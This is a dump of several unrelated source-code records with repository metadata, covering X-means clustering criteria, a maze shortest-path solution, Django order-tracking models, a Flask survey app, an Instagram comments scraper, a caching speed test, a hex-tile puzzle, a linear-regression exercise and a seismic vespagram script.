"""
if self.__criterion == splitting_type.BAYESIAN_INFORMATION_CRITERION:
return self.__bayesian_information_criterion(clusters, centers)
elif self.__criterion == splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH:
return self.__minimum_noiseless_description_length(clusters, centers)
else:
assert 0
def __minimum_noiseless_description_length(self, clusters, centers):
"""!
@brief Calculates splitting criterion for input clusters using minimum noiseless description length criterion.
@param[in] clusters (list): Clusters for which splitting criterion should be calculated.
@param[in] centers (list): Centers of the clusters.
        @return (double) Returns splitting criterion in line with the minimum noiseless description length criterion.
                 A low value of the splitting criterion means that the current structure is better.
@see __bayesian_information_criterion(clusters, centers)
"""
score = float('inf')
W = 0.0
K = len(clusters)
N = 0.0
sigma_square = 0.0
alpha = self.__alpha
alpha_square = alpha * alpha
beta = self.__beta
for index_cluster in range(0, len(clusters), 1):
Ni = len(clusters[index_cluster])
if Ni == 0:
return float('inf')
Wi = 0.0
for index_object in clusters[index_cluster]:
Wi += self.__metric(self.__pointer_data[index_object], centers[index_cluster])
sigma_square += Wi
W += Wi / Ni
N += Ni
if N - K > 0:
sigma_square /= (N - K)
sigma = sigma_square ** 0.5
Kw = (1.0 - K / N) * sigma_square
Ksa = (2.0 * alpha * sigma / (N ** 0.5)) * (alpha_square * sigma_square / N + W - Kw / 2.0) ** 0.5
UQa = W - Kw + 2.0 * alpha_square * sigma_square / N + Ksa
score = sigma_square * K / N + UQa + sigma_square * beta * ((2.0 * K) ** 0.5) / N
return score
def __bayesian_information_criterion(self, clusters, centers):
"""!
@brief Calculates splitting criterion for input clusters using bayesian information criterion.
@param[in] clusters (list): Clusters for which splitting criterion should be calculated.
@param[in] centers (list): Centers of the clusters.
@return (double) Splitting criterion in line with bayesian information criterion.
High value of splitting criterion means that current structure is much better.
@see __minimum_noiseless_description_length(clusters, centers)
"""
scores = [float('inf')] * len(clusters) # splitting criterion
dimension = len(self.__pointer_data[0])
# estimation of the noise variance in the data set
sigma_sqrt = 0.0
K = len(clusters)
N = 0.0
for index_cluster in range(0, len(clusters), 1):
for index_object in clusters[index_cluster]:
sigma_sqrt += self.__metric(self.__pointer_data[index_object], centers[index_cluster])
N += len(clusters[index_cluster])
if N - K > 0:
sigma_sqrt /= (N - K)
p = (K - 1) + dimension * K + 1
# in case of the same points, sigma_sqrt can be zero (issue: #407)
sigma_multiplier = 0.0
if sigma_sqrt <= 0.0:
sigma_multiplier = float('-inf')
else:
sigma_multiplier = dimension * 0.5 * log(sigma_sqrt)
# splitting criterion
for index_cluster in range(0, len(clusters), 1):
n = len(clusters[index_cluster])
L = n * log(n) - n * log(N) - n * 0.5 * log(2.0 * numpy.pi) - n * sigma_multiplier - (n - K) * 0.5
# BIC calculation
scores[index_cluster] = L - p * 0.5 * log(N)
return sum(scores)
def __verify_arguments(self):
"""!
@brief Verify input parameters for the algorithm and throw exception in case of incorrectness.
"""
if len(self.__pointer_data) == 0:
raise ValueError("Input data is empty (size: '%d')." % len(self.__pointer_data))
if len(self.__centers) == 0:
raise ValueError("Initial centers are empty (size: '%d')." % len(self.__pointer_data))
        if self.__tolerance < 0:
            raise ValueError("Tolerance (current value: '%f') should be greater than or equal to 0." %
                             self.__tolerance)
if self.__repeat <= 0:
raise ValueError("Repeat (current value: '%d') should be greater than 0." %
self.__repeat)
if self.__alpha < 0.0 or self.__alpha > 1.0:
raise ValueError("Parameter for the probabilistic bound Q(alpha) should in the following range [0, 1] "
"(current value: '%f')." % self.__alpha)
if self.__beta < 0.0 or self.__beta > 1.0:
raise ValueError("Parameter for the probabilistic bound Q(beta) should in the following range [0, 1] "
"(current value: '%f')." % self.__beta)
|
annoviko/pyclustering
|
pyclustering/cluster/xmeans.py
|
xmeans.py
|
py
| 28,247 |
python
|
en
|
code
| 1,113 |
github-code
|
6
|
41675770750
|
# Maze making (problem 2665)
import sys
import heapq
input = sys.stdin.readline
N = int(input())
# Build the maze
maze = [list(map(int, list(input().rstrip()))) for _ in range(N)]
# Create the queue used to explore the maze
queue = [[0, 0, 0]]
# N x N visited list
visited = [[False for _ in range(N)] for _ in range(N)]
# Four directions: up, down, left, right
direction = [(1, 0), (0, -1), (-1, 0), (0, 1)]
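# 0-1 weighted search: stepping into a white room (value 1) costs 0, breaking open a black room
# (value 0) costs 1, so popping the cheapest state from the min-heap (Dijkstra) guarantees the
# first arrival at (N-1, N-1) uses the minimum number of broken rooms.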
while queue:
cost, r, c = heapq.heappop(queue)
    # If this is the destination, print the cost and exit
if r == N - 1 and c == N - 1:
print(cost)
exit(0)
    # Explore the four directions (check index bounds and whether already visited)
for d in direction:
next_r = r + d[0]
next_c = c + d[1]
if 0 <= next_r < N and 0 <= next_c < N and not visited[next_r][next_c]:
            # Weight 0 for a white room, 1 for a black room
next_cost = 0 if maze[next_r][next_c] == 1 else 1
visited[next_r][next_c] = True
heapq.heappush(queue, [cost + next_cost, next_r, next_c])
|
jisupark123/Python-Coding-Test
|
알쓰/week3/2665.py
|
2665.py
|
py
| 1,049 |
python
|
ko
|
code
| 1 |
github-code
|
6
|
33353045212
|
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from django.db.models.signals import pre_delete
from django.dispatch import receiver
class CommonInfo(models.Model):
    # Start time; auto_now_add=True,
    startday = models.DateField(verbose_name="下单时间", null=True)
    # End time
    endday = models.DateField(verbose_name="交货时间", null=True)
    # Remarks
remark = models.TextField(default="", verbose_name="备注")
status_choice = (
('pending', "未开始"),
('process', "进行中"),
('finish', "已完成")
)
status = models.CharField(
max_length=10,
choices=status_choice,
default='pending',
verbose_name="订单状态",
)
class Meta:
abstract = True
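# Note: Productplan and the Process* models below all inherit startday / endday / remark / status
# from CommonInfo; each Process* model additionally holds a OneToOne link back to its Productplan
# order and an auto-updated timestamp.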
class Productplan(CommonInfo):
    # Order number
    orderid = models.CharField(max_length=10, verbose_name="订单号")
    # Order category
category_choice = (
('std', "标准"),
('unstd', "非标")
)
category = models.CharField(
max_length=5,
choices=category_choice,
default='std',
verbose_name="订单类型",
)
    # Model number
    productid = models.CharField(max_length=20, verbose_name="产品型号")
    # Serial number
    serial = models.CharField(max_length=20, verbose_name="序列号")
    # Customer
    customer = models.CharField(max_length=20, verbose_name="用户")
    # Configuration sheet
    conffile = models.FileField(upload_to='service_files/%Y%m%d/', blank=True)
    # Update time
updated = models.DateTimeField(auto_now=True)
def __str__(self):
return self.customer + "_SN" + self.serial
class Meta:
ordering = ('-updated',)
verbose_name_plural = "订单管理"
@receiver(pre_delete, sender=Productplan)
def delete(sender, instance, **kwargs):
instance.conffile.delete(False)
class ProcessElPrepare(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='proel',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "电路板准备"
class ProcessMePrepare(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prome',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "机械件准备"
class ProcessScPrepare(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prosc',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "干涉仪准备"
class ProcessAssemble(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='proas',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "装配中"
class ProcessTesting(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prots',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "测试中"
def __str__(self):
return self.orderid.customer
# Add software status
class ProcessSoftware(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prosw',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "软件"
def __str__(self):
return self.orderid.customer
# Add payment status
class ProcessPayment(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='propm',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "付款"
def __str__(self):
return self.orderid.customer
# Add delivery status
class ProcessDeliver(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prodi',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "发货"
def __str__(self):
return self.orderid.customer
# Add invoicing status
class ProcessBilling(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='probi',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "开票"
def __str__(self):
return self.orderid.customer
# Add final-payment status
class ProcessDueing(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='produe',
primary_key=True
)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "尾款"
def __str__(self):
return self.orderid.customer
class ProductHistory(models.Model):
    # Operator
user = models.ForeignKey(
User,
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='user'
)
    # Order
orderid = models.ForeignKey(
Productplan,
verbose_name="订单号",
on_delete=models.CASCADE,
related_name='product_history',
primary_key=False
)
    # Operation item
    proitem = models.CharField(max_length=10, verbose_name="操作项目")
    # New content
    newcontent = models.CharField(max_length=10, verbose_name="新内容")
    # Operation time
    operateday = models.DateTimeField(verbose_name="操作时间", null=True)
    # Update time
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "订单历史"
def __str__(self):
return self.orderid.customer
|
willmaker2022/drfvueblog
|
productplan/models.py
|
models.py
|
py
| 6,808 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26846946693
|
n = ['casa','branco','verde']
for ordem,lista in enumerate(n):
print(f'{ordem+1}° {lista}' ,end=(' '))
print()
lanche = ["X,Salada","Hot Dog","Misto Quente","Coca Cola","Pastel",]
lanche.append("Bacon") #Adcionar
lanche.sort() #Organizar (ordem alfabética)
lanche.sort(reverse=True) #Organiza Inverso
lanche.insert(3,"Calabresa") #Inseri na posição algo
#lanche.pop(1) #Remove o último caracter
#lanche.remove("Misto Quente")
print(len(lanche))
print(lanche)
for d in range(0,4):
lanche.append(str(input("O que quer acrescentar? ")))
for c,d in enumerate(lanche):
print(f"No cardapio comprei {d.strip()} que era o {c} da lista")
a = [2,3,4,7]
b = a[:] #COPY (slicing makes a new list)
b[2] = 8 #Replaces the 4 with 8 in b only
print(f"Lista A: {a}")
print(f"Lista B: {b}")
|
davileal7/curso-python
|
curso em video/17 Listas 1.py
|
17 Listas 1.py
|
py
| 761 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
30097122943
|
""" Comments scraper class"""
import json
import logging
import random
from time import sleep
import numpy as np
import pandas as pd
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from scripts.argparser import ArgParser
from scripts.auxiliary.scraper_aux import check_or_create_folders, save
from scripts.chrome_driver import ChromeDriver
logging.basicConfig(
format="%(asctime)s | %(levelname)s: %(message)s", level=logging.CRITICAL
)
class CommentsScraper:
def __init__(self):
pass
@staticmethod
def iterate(args, ttw, driver):
# ~ 24 comments loaded each iteration
check = True
MAX_ITER = int(args.max_iterations)
n = 0
while check and n <= MAX_ITER:
sleep(int(random.choice(ttw)))
try:
load_more_comments_button = WebDriverWait(driver, 5).until(
EC.visibility_of_element_located(
(By.CSS_SELECTOR, "[aria-label='Load more comments']")
)
)
load_more_comments_button.click()
except:
check = False
if n == MAX_ITER:
logging.warning(
"Reached the max iterations number before exhausting the post comments. \
You may consider to raise the max iterations number"
)
else:
logging.info("Exhausted all the post comments")
n = n + 1
@classmethod
def setup(self):
argparser = ArgParser()
chrome_driver = ChromeDriver()
proxy = chrome_driver.set_up_proxy()
args = argparser.likes_scraper_read_input()
driver = chrome_driver.set_up_driver(proxy=proxy)
driver = chrome_driver.make_IG_access_w_creds(
driver=driver, ig_usr=args.username, ig_pass=args.password
)
return driver, proxy, args
@classmethod
def scrape(self, driver, proxy, args, save_raw_data=bool, **kwargs):
if "target_post" in kwargs:
proxy.new_har(
kwargs.get("target_post"),
options={"captureHeaders": True, "captureContent": True},
)
driver.get(kwargs.get("target_post"))
target = kwargs.get("target_post")
else:
proxy.new_har(
args.target_post,
options={"captureHeaders": True, "captureContent": True},
)
driver.get(args.target_post)
target = args.target_post
# Random time intervals to sleep between load more comment button pushes
ttw = []
for i in range(0, 20):
ttw.append(np.round(random.uniform(4, 8), 2))
# ~ 24 comments loaded each iteration
CommentsScraper.iterate(args=args, ttw=ttw, driver=driver)
R = json.loads(json.dumps(proxy.har, ensure_ascii=False))
if save_raw_data:
save(data=R, target=target, args=args)
return R
@classmethod
def parse_and_save_data(self, raw_data, args, target):
"Parse raw scraped data and write to disk"
RAW = {}
for n, v in enumerate(raw_data["log"]["entries"]):
if v["response"]["content"]["mimeType"] in [
"application/json; charset=utf-8",
"application/json",
]:
try:
RAW[n] = json.loads(v["response"]["content"]["text"])["comments"]
except:
pass
comments_df = pd.DataFrame.from_dict(RAW[list(RAW.keys())[0]])
for k in list(RAW.keys())[1:]:
comments_df = pd.concat([comments_df, pd.DataFrame.from_dict(RAW[k])])
comments_df = comments_df.reset_index(drop=True)
check_or_create_folders(target=target, args=args)
short_code = target.split("/")[-1]
# TODO FIX get the profile name from somewhere and create the correct folder!
comments_df.to_csv(
f"{args.output_folder}/{short_code}_comments_clean.csv", mode="w+"
)
logging.info("Data correctly saved/overwrote.")
# print(f'Dave saved in: {f"{args.output_folder}_{short_code}_comments_clean.csv"}')
return comments_df
|
ScrPzz/InstagramScraper
|
src/comments_scraper.py
|
comments_scraper.py
|
py
| 4,554 |
python
|
en
|
code
| 2 |
github-code
|
6
|
73815165306
|
from random import random
from time import time
from cachier import cachier
@cachier(next_time=True)
def _test_int_pickling(int_1, int_2):
"""Add the two given ints."""
return int_1 + int_2
def _test_int_pickling_compare(int_1, int_2):
"""Add the two given ints."""
return int_1 + int_2
def test_pickle_speed():
"""Test speeds"""
print("Comparing speeds of decorated vs non-decorated functions...")
num_of_vals = 1000
times = []
for i in range(1, num_of_vals):
tic = time()
_test_int_pickling_compare(i, i + 1)
toc = time()
times.append(toc - tic)
print(' - Non-decorated average = {:.8f}'.format(
sum(times) / num_of_vals))
_test_int_pickling.clear_cache()
times = []
for i in range(1, num_of_vals):
tic = time()
_test_int_pickling(i, i + 1)
toc = time()
times.append(toc - tic)
print(' - Decorated average = {:.8f}'.format(
sum(times) / num_of_vals))
@cachier()
def _test_single_file_speed(int_1, int_2):
"""Add the two given ints."""
# something that takes some memory
return [random() for _ in range(1000000)]
@cachier(separate_files=True)
def _test_separate_files_speed(int_1, int_2):
"""Add the two given ints."""
# something that takes some memory
return [random() for _ in range(1000000)]
def test_separate_files_vs_single_file():
_test_separate_files_speed.clear_cache()
_test_single_file_speed.clear_cache()
start_time = time()
for i in range(3):
for j in range(10):
_test_separate_files_speed(j, 2)
print(f'separate files time: {time() - start_time}')
start_time = time()
for i in range(3):
for j in range(10):
_test_single_file_speed(j, 2)
print(f'single file time: {time() - start_time}')
if __name__ == '__main__':
test_pickle_speed()
|
python-cachier/cachier
|
tests/speed_eval.py
|
speed_eval.py
|
py
| 1,903 |
python
|
en
|
code
| 470 |
github-code
|
6
|
14979508665
|
"""
Funny Strings Problem on HackerRank
Problem Link: https://www.hackerrank.com/challenges/funny-string/problem
Author: Shyam Kumar (@svshyam91)
"""
def funnyString(s):
# Make the list of ascii of characters of string
ascii_str=[ord(c) for c in s]
ascii_str_rev=ascii_str[::-1] # Reverse the ascii list
for i in range(1,len(ascii_str)):
if abs(ascii_str[i]-ascii_str[i-1]) != abs(ascii_str_rev[i]-ascii_str_rev[i-1]):
return "Not Funny"
return "Funny"
if __name__ == '__main__':
q = int(input())
for q_itr in range(q):
s = input()
result = funnyString(s)
print(result)
|
svshyam91/hacker_rank_solutions
|
funny_string.py
|
funny_string.py
|
py
| 676 |
python
|
en
|
code
| 0 |
github-code
|
6
|
392386374
|
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
# random data
A = [2,5,7,9,11,16,19,23,22,29,29,35,37,40,46]
b = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]
# Visualize data
plt.plot(A,b,'ro')
# array to [[ ]]
# change row vector to column vector
A = np.array([A]).T
b = np.array([b]).T
# Create vector 1
ones = np.ones_like(A, dtype = np.int8)
A = np.concatenate((A,ones),axis = 1)
# Use the normal equation: x = (A^T A)^(-1) A^T b  (least-squares solution)
x = np.linalg.inv(A.transpose().dot(A)).dot(A.transpose()).dot(b)
x0 = np.array([1,46]).T
y0 = x[0][0]*x0 + x[1][0]
# there is no matrix-plus-scalar operation in pure linear algebra,
# but numpy broadcasts the scalar and adds it to every element of the matrix
# Test predict data
x_test = 12
y_test = x[0][0]*x_test + x[1][0]
print(y_test)
# Visualize x0,y0
plt.plot(x0,y0)
plt.show()
|
suanthuy/AI_Project
|
Unit3.1_linear.py
|
Unit3.1_linear.py
|
py
| 773 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27610406237
|
from flask import Flask, request, render_template, redirect, flash, session
from flask_debugtoolbar import DebugToolbarExtension
from surveys import surveys, satisfaction_survey, personality_quiz
app = Flask(__name__)
app.config['SECRET_KEY'] = "secret_code_here"
# app.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False
# debug = DebugToolbarExtension(app)
@app.route('/')
def choose_the_servey():
""" start-page that allows a user to choose a survey from a survey list """
return render_template('choose_survey.html', surveys=surveys.items())
@app.route('/start-page', methods=['POST'])
def start_survey():
"""render a page for the chosen survey that shows the user the title of the survey, the instructions, and a button to start the survey;
setup session variables """
current_survey=surveys[request.form.get('choice')] #current survey object
session['title'] = current_survey.title
session['num_of_questions'] = len(current_survey.questions)
session['survey'] = request.form['choice'] # key of current survey in surveys list
session['comments'] = []
return render_template('start.html', instructions = current_survey.instructions)
@app.route('/start', methods=['POST'])
def handling_start():
""" Set a current session responses-list to an empty list and redirect to the start of the survey """
session['responses'] = []
return redirect('/questions/0')
@app.route('/questions/<question_number>')
def question_page(question_number):
""" Page shows a form asking the current question, and listing the choices as radio buttons, also comments if are allowed """
answers = session['responses']
if len(answers) == session['num_of_questions']:
return render_template('thanks.html')
if len(answers) == int(question_number):
number = int(question_number)
else:
flash('Could you please answer this question, you tried to access an invalid question','error')
number = len(answers)
current_survey = surveys[session['survey']]
current_question = current_survey.questions[number]
return render_template('question.html', number = number, choices = current_question.choices, question = current_question.question, title = current_survey.title, allow_text = current_question.allow_text)
@app.route('/answer', methods=['POST'])
def handling_answer():
""" function appends the answer to responses list, adds comments if necessary and then redirect user to the next question; if no more questions in the survey - render thanks page ."""
comment = request.form.get('comment')
current_answer = request.form.get('choice')
answers = session['responses']
if current_answer:
answers.append(current_answer)
session['responses'] = answers
if comment:
comments = session['comments']
comments.append((len(answers),comment))
session['comments'] = comments
else:
flash('We are still waiting for your response!','error')
if len(answers) < session['num_of_questions']:
next_question = f"/questions/{len(answers)}"
return redirect(next_question)
else:
return render_template('thanks.html')
|
Tetyana-I/flask-survey
|
app.py
|
app.py
|
py
| 3,204 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73652466109
|
class Solution(object):
res = []
def postorder(self, root):
"""
:type root: Node
:rtype: List[int]
"""
self.res = []
self.postorder_find(root)
return self.res
def postorder_find(self, root):
if root == None:
return
for child in root.children:
self.postorder_find(child)
self.res.append(root.val)
|
xxxxlc/leetcode
|
tree/postorder.py
|
postorder.py
|
py
| 430 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7824439491
|
#LIBRARIES TO USE
import pandas as pd
from sklearn.impute import SimpleImputer
import numpy as np
from sklearn.preprocessing import LabelEncoder
import matplotlib.pyplot as plt
import seaborn as seabornInstance
from sklearn.model_selection import train_test_split #library to split the data into training and test sets
from sklearn.linear_model import LinearRegression #library to build the linear regression
from sklearn import metrics
#PRELIMINARY ANALYSIS
"""
From a preliminary look at the file alone, I can deduce that it contains
the age of a person, the sex of the insurance applicant, bmi (from what I googled, it is a reimbursement that can be given),
how many children they have, whether they smoke or not, and the insurance price to pay.
From this I can infer that my prediction will be a multiple linear regression, since the dependent variable is the insurance charge and it is affected
by all the other columns, i.e. the insurance price increases with all the previous conditions (age, bmi, children, smoker or not, and the applicant's region).
"""
#-------------LOAD THE FILE TO USE -------------------------------
ruta =r'Unsam.Clase.12.4.6.2021\Unsam.Clase.12.4.6.2021\cvs_para_el_TP\seguro.csv'
dataSet = pd.read_csv(ruta) #file to use
#-----------------ANALYSIS OF MY DATA ---------------------
print(dataSet)
#print("CANTIDAD DE FILAS Y COLUMNAS")
#print(dataSet.shape)
#no hace falta hacer el shape ya que al imprimir el dataSet, me dice cuantas filas y columnas tengo
print(dataSet.describe())
#compruebo si hay valores nan en mi codigo
print("Valores null o nan en el dataSet: ")
print(dataSet.isna().values.any())
print(dataSet.isnull().values.any())
#devuelve falso por ende no tengo valores NaN o null
#-------------SEPARO LAS VARIABLES QUE VOY A USAR------------
X = dataSet[['age','sex','bmi','children','smoker','region' ]].values
Y = dataSet['charges'].values
print("X:\n")
print(X) #matrix / independent variables
print("Y:\n")
print(Y) #vector / dependent variable
#----------------START PREPARING THE DATA-------------
"""
Age and bmi are already numeric, workable values, so I leave them as they are in order to carry out my analysis
"""
#ENCODE THE SEX COLUMN AS 1 AND 0
labelencoder_X=LabelEncoder()
X[:,1]=labelencoder_X.fit_transform(X[:,1])
#ENCODE THE SMOKER COLUMN AS 1 AND 0
labelencoder_X=LabelEncoder()
X[:,4]=labelencoder_X.fit_transform(X[:,4])
#ENCODE THE REGION COLUMN: SOUTH AND NORTH (WITH EAST AND WEST ORIENTATION)
labelencoder_X=LabelEncoder()
X[:,-1]=labelencoder_X.fit_transform(X[:,-1])
print("Matriz X luego de preparacion de datos : \n")
print(X)
#QUESTION: SHOULD AGE BE SCALED?
#-------------PLOT MY DEPENDENT VARIABLE TO DRAW SOME CONCLUSIONS -----------
plt.figure(figsize=(10,5))
plt.tight_layout()
plt.title('Densidad de mi variable Dependiente')
seabornInstance.distplot(dataSet['charges'], color = 'lightblue')
plt.show()
"""
De este Grafico podemos concluir que mi variable dependiente 'charges' que seria el precio a pagar del seguro,
varia entre 0 y 70000 , y la mayor densidad(mayor cantidad de match) las hace desde el 0 hasta el 10000 aproximadamente.
"""
#------------------DIVIDIR LOS DATOS EN ENTRENAMIENTO Y TEST -----------------
#80 porciento de mis datos en entrenamiento y 20 en test
X_train , X_test, Y_train, Y_test = train_test_split(X , Y , test_size = 0.2, random_state=0)
#comienzo a entrenar mi modelo
regressor = LinearRegression()
regressor.fit(X_train, Y_train)
#------------------DROP MY CHARGES COLUMN (THE DEPENDENT VARIABLE)-----------
dataFrame= dataSet.drop(['charges'], axis = 1) #drop (remove) my dependent variable from my data frame
dataFrame = dataFrame.T #transpose rows and columns; COULD ALSO USE TRANSPOSE()
dataFrame = dataFrame.index #keep only the labels in my dataframe
print(dataFrame) #print the labels to check that they were stored correctly
#-----------------FIND THE MOST OPTIMAL COEFFICIENTS FOR MY ATTRIBUTES----------------
coeficiente_dataFrame = pd.DataFrame(regressor.coef_, dataFrame, columns= ['Coeficiente'])
print(coeficiente_dataFrame)
#after printing I conclude that rows and columns were transposed and each attribute has its corresponding coefficient
#---------------PREDICTION--------------------
y_prediccion = regressor.predict(X_test)
#take my dataFrame that holds my indexes
dataFrame = pd.DataFrame({'Actual': Y_test, 'Prediccion': y_prediccion})
dataFrame_prediccion = dataFrame.head(30)
print(dataFrame_prediccion)
#-------------------PLOT MY PREDICTION -----------------
dataFrame_prediccion.plot(kind='bar',figsize=(10,8)) #TELL IT THIS IS A BAR CHART AND SET THE SIZE
plt.title('Actual vs Prediccion')
plt.grid(which='major', linestyle='-', linewidth='0.5', color='black')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
#----------------CHECK THE PERFORMANCE OF MY ALGORITHM ---------------
print('Promedio de Error Absoluto:', metrics.mean_absolute_error(Y_test, y_prediccion))
print('Promedio de Error de Raiz:', metrics.mean_squared_error(Y_test, y_prediccion))
print('Error cuadratico medio de la raiz:', np.sqrt(metrics.mean_squared_error(Y_test, y_prediccion)))
#FINAL CONCLUSION
"""
From the analysis carried out, we can deduce that the prediction is not good at all, since the average errors
far exceed 10 percent - roughly 15 percent (being generous). It is not a very accurate analysis, but for our case
it is acceptable (because I used multiple linear regression, so the more factors that affect my dependent variable, the further I get from an accurate prediction),
since the columns in which it exceeds that percentage are 14, 20 and 23, which, being generous, would add roughly an extra 25 percent.
"""
"""
PS: Sorry for the way I speak or write, but honestly the conclusions took me longer than the code haha.
If there is anything I should change or improve, please tell me.
Thank you very much for EVERYTHING
Regards: Alex Sosa :)
"""
|
alextsosa17/Analisis-de-Datos-y-prediccion--Python
|
TpFinalAlexSosa.py
|
TpFinalAlexSosa.py
|
py
| 6,299 |
python
|
es
|
code
| 0 |
github-code
|
6
|
3508302141
|
#!/usr/bin/env python3
class Tile:
def __init__(self, x: int, y: int):
self._x = x
self._y = y
self._c = 'W'
self._nc = None
def nw(self):
return self._x - 1, self._y - 1
def ne(self):
return self._x + 1, self._y - 1
def sw(self):
return self._x - 1, self._y + 1
def se(self):
return self._x + 1, self._y + 1
def w(self):
return self._x - 2, self._y
def e(self):
return self._x + 2, self._y
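    # The grid uses "double-width" hex coordinates: east/west moves change x by 2, while the four
    # diagonal moves change x and y by 1 each, so x + y stays even for every reachable tile.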
def flip(self):
self._c = 'B' if self._c == 'W' else 'W'
def flip_later(self):
assert self._nc is None
self._nc = 'B' if self._c == 'W' else 'W'
# print('flipping later', self._x, self._y, 'to', self._nc)
def commit(self):
if self._nc is not None:
self._c = self._nc
self._nc = None
@property
def color(self):
return self._c
class Floor:
def __init__(self):
self._f = {}
def get(self, x, y):
if not (x, y) in self._f:
self._f[(x, y)] = Tile(x, y)
return self._f[(x, y)]
def count(self, c: str):
count = 0
for tile in self._f.values():
if tile.color == c:
count += 1
return count
def x_lim(self):
max, min = None, None
for coord in self._f:
if max is None or coord[0] > max:
max = coord[0]
if min is None or coord[0] < min:
min = coord[0]
return min, max
def y_lim(self):
max, min = None, None
for coord in self._f:
if max is None or coord[1] > max:
max = coord[1]
if min is None or coord[1] < min:
min = coord[1]
return min, max
def count_adj(self, tile: Tile, c: str):
count = 0
count += int(self.get(*tile.ne()).color == c)
count += int(self.get(*tile.nw()).color == c)
count += int(self.get(*tile.e()).color == c)
count += int(self.get(*tile.w()).color == c)
count += int(self.get(*tile.se()).color == c)
count += int(self.get(*tile.sw()).color == c)
return count
def flip(self):
# for coord, tile in dict(self._f).items():
x_min, x_max = self.x_lim()
y_min, y_max = self.x_lim()
for x in range(x_min - 1, x_max + 2):
for y in range(y_min - 1, y_max + 2):
tile = self.get(x,y)
if tile.color == 'B' and self.count_adj(tile, 'B') in [0, 3, 4, 5, 6]:
tile.flip_later()
if tile.color == 'W' and self.count_adj(tile, 'B') == 2:
tile.flip_later()
for _, tile in self._f.items():
tile.commit()
floor = Floor()
for seq in open('24.input').readlines():
tile = floor.get(0, 0)
c_iter = iter(seq)
while True:
c = next(c_iter)
if c == 'n':
c = next(c_iter)
if c == 'e':
x, y = tile.ne()
elif c == 'w':
x, y = tile.nw()
else:
raise ValueError('unknown north')
elif c == 's':
c = next(c_iter)
if c == 'e':
x, y = tile.se()
elif c == 'w':
x, y = tile.sw()
else:
raise ValueError('unknown south')
elif c == 'e':
x, y = tile.e()
elif c == 'w':
x, y = tile.w()
elif c == '\n':
break
else:
raise ValueError('unknown direction', c)
tile = floor.get(x, y)
tile.flip()
black = floor.count('B')
print('initial black tiles', black)
for day in range(1, 101):
floor.flip()
print(day, floor.count('B'))
|
pboettch/advent-of-code
|
2020/24.py
|
24.py
|
py
| 3,821 |
python
|
en
|
code
| 1 |
github-code
|
6
|
25875832480
|
#!/usr/bin/env python
# This is more of a work in progress, but this script will
# test the code for creating vespagrams with our curved wavefront correction.
import obspy
import numpy as np
import time
import matplotlib.pyplot as plt
import circ_array as c
from circ_beam import Vespagram_Lin, Vespagram_PWS, Baz_vespagram_PWS, Baz_vespagram_Lin
from array_plotting import plotting
# parameters
# phase of interest
phase = 'SKS'
phases = ['SKS','SKKS','ScS','Sdiff','sSKS','sSKKS','PS','SKKKS','pSKS']
# frequency band
fmin = 0.13
fmax = 0.26
st = obspy.read('./data/19970525/*SAC')
# get array metadata
event_time = c.get_eventtime(st)
geometry = c.get_geometry(st)
distances = c.get_distances(st,type='deg')
mean_dist = np.mean(distances)
stations = c.get_stations(st)
# get travel time information and define a window
Target_phase_times, time_header_times = c.get_predicted_times(st,phase)
avg_target_time = np.mean(Target_phase_times)
min_target = int(np.nanmin(Target_phase_times, axis=0))
max_target = int(np.nanmax(Target_phase_times, axis=0)) + 100
stime = event_time + min_target
etime = event_time + max_target
# trim the stream
# Normalise and cut seismogram around defined window
st = st.copy().trim(starttime=stime, endtime=etime)
st = st.normalize()
# get predicted slownesses and backazimuths
predictions = c.pred_baz_slow(
stream=st, phases=phases, one_eighty=True)
# find the line with the predictions for the phase of interest
row = np.where((predictions == phase))[0]
